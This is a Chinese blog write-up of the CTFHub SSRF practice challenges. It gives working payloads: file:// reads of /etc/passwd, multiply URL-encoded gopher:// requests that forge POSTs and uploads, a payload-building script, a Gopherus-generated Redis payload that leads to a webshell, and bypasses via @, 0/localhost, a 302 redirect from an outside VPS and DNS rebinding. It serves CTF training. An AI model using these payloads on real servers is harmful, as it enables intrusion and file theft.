banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

ctfhub ssrf技能树练习

173
AI-generated summary
The text discusses various tasks related to network access, file reading, port scanning, and file uploading. It provides instructions on how to construct payloads and make requests using different protocols such as gopher and file. The goal is to access and manipulate certain files on a web server.

内网访问#

这题比较简单,直接访问即可。

image

伪协议读取文件#

file 伪协议

先读取 /etc/passwd

image

读取 web 目录下的 flag.php

image

端口扫描#

image

image

image

POST 请求#

尝试 GET 请求发送如下包,返回如下内容;

image

题目提示发送 POST 请求,那就需要用到 gopher 协议了。

根据响应包,构造 gopher payload。

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=a80ea933ead842996c204517423ae75e

编码 url:https://www.bejson.com/enc/urlencode/,或者使用 burp 的 decode 功能。

第一次编码后内容如下:

POST%20/flag.php%20HTTP/1.1%0AHost:%20127.0.0.1:80%0AContent-Type:%20application/x-www-form-urlencoded%0AContent-Length:%2036%0A%0Akey=200890c79882ceba049a7d02bee2ef1f

image

把 %0A 换成 %0D%0A

POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D200890c79882ceba049a7d02bee2ef1f

第二次编码

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D200890c79882ceba049a7d02bee2ef1f

image

所以最终 payload 如下:

?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D200890c79882ceba049a7d02bee2ef1f

然后发送请求

image

文件上传#

image

访问 flag.php 试试

http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php

image

无提交框,构造 submit

image

尝试使用 file 协议读取源码。

image

根据源码提示,判断是否存在文件以及文件不为空,上传一个 txt 文件,然后抓包。

image

在构造 payload 之前,需要删除Accept-Encoding: gzip, deflate

image

POST /flag.php HTTP/1.1
Host: challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Content-Length: 281
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Referer: http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarylrZVoi6bEshmiqB0
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain

111
------WebKitFormBoundarylrZVoi6bEshmiqB0
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundarylrZVoi6bEshmiqB0--

先进行第一次编码。

POST%20/flag.php%20HTTP/1.1%0AHost:%20challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0AContent-Length:%20281%0ACache-Control:%20max-age=0%0AUpgrade-Insecure-Requests:%201%0AOrigin:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0AContent-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%0AUser-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/99.0.4844.74%20Safari/537.36%0AAccept:%20text/html,application/xhtml+xml,application/xml;q=0.9%0AReferer:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%0AAccept-Language:%20zh-CN,zh;q=0.9%0AConnection:%20close%0A%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0AContent-Type:%20text/plain%0A%0A111%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0AContent-Disposition:%20form-data;%20name=%22submit%22%0A%0A%E6%8F%90%E4%BA%A4%0A------WebKitFormBoundarylrZVoi6bEshmiqB0--

把 %0A 换成 %0D%0A,替换后内容如下:

POST%20/flag.php%20HTTP/1.1%0D%0AHost:%20challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0D%0AContent-Length:%20281%0D%0ACache-Control:%20max-age=0%0D%0AUpgrade-Insecure-Requests:%201%0D%0AOrigin:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0D%0AContent-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AUser-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/99.0.4844.74%20Safari/537.36%0D%0AAccept:%20text/html,application/xhtml+xml,application/xml;q=0.9%0D%0AReferer:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%0D%0AAccept-Language:%20zh-CN,zh;q=0.9%0D%0AConnection:%20close%0D%0A%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0D%0AContent-Type:%20text/plain%0D%0A%0D%0A111%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AContent-Disposition:%20form-data;%20name=%22submit%22%0D%0A%0D%0A%E6%8F%90%E4%BA%A4%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0--

第二次编码

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%250D%250AContent-Length:%2520281%250D%250ACache-Control:%2520max-age=0%250D%250AUpgrade-Insecure-Requests:%25201%250D%250AOrigin:%2520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64)%2520AppleWebKit/537.36%2520(KHTML,%2520like%2520Gecko)%2520Chrome/99.0.4844.74%2520Safari/537.36%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9%250D%250AReferer:%2520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AAccept-Language:%2520zh-CN,zh;q=0.9%250D%250AConnection:%2520close%250D%250A%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.txt%2522%250D%250AContent-Type:%2520text/plain%250D%250A%250D%250A111%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0--

第三次编码

POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost:%252520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Length:%252520281%25250D%25250ACache-Control:%252520max-age=0%25250D%25250AUpgrade-Insecure-Requests:%2525201%25250D%25250AOrigin:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Type:%252520multipart/form-data;%252520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AUser-Agent:%252520Mozilla/5.0%252520(Windows%252520NT%25252010.0;%252520Win64;%252520x64)%252520AppleWebKit/537.36%252520(KHTML,%252520like%252520Gecko)%252520Chrome/99.0.4844.74%252520Safari/537.36%25250D%25250AAccept:%252520text/html,application/xhtml+xml,application/xml;q=0.9%25250D%25250AReferer:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%25250D%25250AAccept-Language:%252520zh-CN,zh;q=0.9%25250D%25250AConnection:%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522file%252522;%252520filename=%2525221.txt%252522%25250D%25250AContent-Type:%252520text/plain%25250D%25250A%25250D%25250A111%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0--

最终 payload

GET /?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost:%252520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Length:%252520281%25250D%25250ACache-Control:%252520max-age=0%25250D%25250AUpgrade-Insecure-Requests:%2525201%25250D%25250AOrigin:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Type:%252520multipart/form-data;%252520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AUser-Agent:%252520Mozilla/5.0%252520(Windows%252520NT%25252010.0;%252520Win64;%252520x64)%252520AppleWebKit/537.36%252520(KHTML,%252520like%252520Gecko)%252520Chrome/99.0.4844.74%252520Safari/537.36%25250D%25250AAccept:%252520text/html,application/xhtml+xml,application/xml;q=0.9%25250D%25250AReferer:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%25250D%25250AAccept-Language:%252520zh-CN,zh;q=0.9%25250D%25250AConnection:%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522file%252522;%252520filename=%2525221.txt%252522%25250D%25250AContent-Type:%252520text/plain%25250D%25250A%25250D%25250A111%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0-- HTTP/1.1
Host: challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

二次编码脚本#

import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------224170729831654278414248977569
Content-Length: 525
Origin: http://challenge-fbeb7e53e47ecd22.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-fbeb7e53e47ecd22.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: application/octet-stream
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="submit"

123
-----------------------------224170729831654278414248977569--
123
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="submit"

123
-----------------------------224170729831654278414248977569--
"""

#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # 这里因为是GET请求所以要进行两次url编码

redis#

判断是否存在 redis 漏洞

image

利用Gopherus 工具生成 payload。

image

通过url 编码网站进行二次编码

image

发送数据包

image

webshell 连接

image

URL Bypass#

image

提示只能通过http://notfound.ctfhub.com 这个域去访问,需要进行绕过,可以通过 @符号去绕过。

http://challenge-393a59f384add707.sandbox.ctfhub.com:10800/?url=http://[email protected]/flag.php

image

数字 IP Bypass#

image

黑名单,ban 掉了 127 以及 172.,这种情况下有很多绕过方式。

http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://0/flag.php
http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://localhost/flag.php

image

302 跳转 Bypass#

image

根据题目提示,需要利用 302 去 bypass。

利用 302bypass 需要在 vps 服务器上搭建 http 以及 php 服务,然后创建下面的 php 文件。


<?php
header("Location:http://127.0.0.1/flag.php");
?>

最终 url 为

http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://1.116.2.18:8009/302.php

如果没有 php 环境则代码原样输出。

image

另一种方式,先获取源码。

image

过滤了

/127|172|10|192/

但是未过滤 localhost

image

DNS 重绑定 Bypass#

image

通过https://lock.cmpxchg8b.com/rebinder.html 网站进行解题

image

这个网站会随机只想上图两个中的随机一个内网 ip,由于 127 段是回环地址,所以 AB 两个 ip 都指向 127.0.0.1,每一个都能访问 localhost。

http://challenge-c3fc88b00a1e6234.sandbox.ctfhub.com:10800/?url=http://7f000001.7f000002.rbndr.us/flag.php

image

参考:
CTFHub-SSRF - 文件上传
CTFHUB - 技能树 - Web-SSRF - 上传文件
浅谈 DNS 重绑定漏洞

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.